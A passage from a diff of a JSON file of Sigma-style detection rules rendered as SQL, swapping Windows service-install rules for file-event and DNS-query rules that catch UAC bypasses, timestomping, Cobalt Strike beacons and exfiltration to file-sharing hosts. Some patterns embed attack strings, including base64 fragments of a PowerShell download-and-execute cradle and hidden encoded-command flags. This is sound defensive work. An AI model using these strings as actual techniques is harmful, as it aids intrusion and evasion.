ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE 